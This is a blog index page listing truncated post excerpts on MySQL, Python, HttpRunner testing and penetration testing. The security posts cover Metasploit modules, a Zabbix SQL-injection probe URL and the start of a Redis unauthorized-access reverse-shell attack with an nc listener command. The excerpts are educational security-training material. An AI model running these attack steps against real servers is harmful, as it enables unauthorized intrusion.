会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
唯安格
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
下一页
2021年4月30日
MySQL基本数据类型
摘要: 一、整型 分类:TINYINT, SMALLINT, MEDUIMINT, INT, BIGINT TINYINT 默认情况下是带有符号的,超出限制只存最大可接受值 create table test1(id TINYINT); insert into test1 values(-129,256);
阅读全文
posted @ 2021-04-30 14:49 唯安格
阅读(123)
评论(0)
推荐(0)
2021年4月2日
Httprunner3.X+jenkins持续集成
摘要: 一、HttpRunner安装 HttpRunner存储于PyPI, 支持通过pip安装 pip install httprunner 查看httprunner版本,不报错就OK了 $ httprunner -V # hrun -V 3.1.0 allure安装 pip install allure-
阅读全文
posted @ 2021-04-02 16:34 唯安格
阅读(1219)
评论(0)
推荐(0)
2020年9月18日
MSF使用之信息收集
摘要: Nmap扫描 db_nmap -sV 192.168.1.0/24 Auxiliary模块 RHOSTS在指定目标时可以指定多个目标 指定IP范围:192.168.171.1.20-192.168.171.30 指定两个主机段:192.168.1.0/24,192.168.11.0/24 导入文件中
阅读全文
posted @ 2020-09-18 11:34 唯安格
阅读(735)
评论(0)
推荐(0)
MSF使用之meterpreter模块
摘要: 一、简介 Meterpreter是Metasploit提供的一个非常强大的后渗透工具 Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell 这里的payload就是shellcode,以获得目标系统的shell为目的的payload 我们获得的
阅读全文
posted @ 2020-09-18 11:24 唯安格
阅读(2894)
评论(0)
推荐(0)
2020年8月31日
MSF使用之payload模块
摘要: 一、exploit和payload exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payload,payload才是真正实现我们攻击的代码(获得shell等等) 以缓冲区溢出为例,exploit模块告诉你在寄存器中要填充多少个字符,让寄存器下一条指令执行的代码位置跳转到我们的pay
阅读全文
posted @ 2020-08-31 18:35 唯安格
阅读(3393)
评论(0)
推荐(0)
正则表达式
摘要: 常用匹配模式(元字符) # 匹配模式 #一对一的匹配 # 'hello'.replace(old,new) # 'hello'.find('pattern') #正则匹配 import re #\w与\W print(re.findall('\w','hello egon 123')) #['h',
阅读全文
posted @ 2020-08-31 18:32 唯安格
阅读(186)
评论(0)
推荐(0)
2020年8月24日
MSF基本使用和expolit模块介绍
摘要: MSF基本介绍 目前最流行、最强大、最具扩展性的渗透测试平台软件 2003年由HD More发布第一版,2007年用ruby语言重写,MSF默认集成在Kali Linux之中 Kali左侧有MSF的快捷方式,可以直接点击使用,也可以在终端输入msfconsole启动MSF msfdb 用来管理MSF
阅读全文
posted @ 2020-08-24 18:25 唯安格
阅读(2002)
评论(0)
推荐(1)
2020年7月17日
Python三元表达式
摘要: 三元表达式是python为我们提供的一种简化代码的解决方案,语法如下: res = 条件成立时返回的值 if 条件 else 条件不成立时返回的值 针对下述场景: def max2(x,y): if x > y: return x else: return y res = max2(1,2) 用三元
阅读全文
posted @ 2020-07-17 17:39 唯安格
阅读(973)
评论(0)
推荐(0)
2020年6月28日
zabbix服务漏洞利用入侵服务器
摘要: zabbix服务开放端口为10051,浏览器访问http://IP/zabbix进行配置即可访问zabbix的前台页面。 漏洞利用: 1、sql注入漏洞探测: 在攻击机访问的zabbix的地址后面加上如下url: /jsrpc.php?sid=0bcd4ade648214dc&type=9&meth
阅读全文
posted @ 2020-06-28 17:54 唯安格
阅读(4715)
评论(0)
推荐(0)
2020年6月24日
redis未授权访问漏洞利用获得shell
摘要: 方法一、利用计划任务执行命令反弹shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口: nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli -h 192.168.63.130 192.168.6
阅读全文
posted @ 2020-06-24 10:38 唯安格
阅读(3316)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
下一页
公告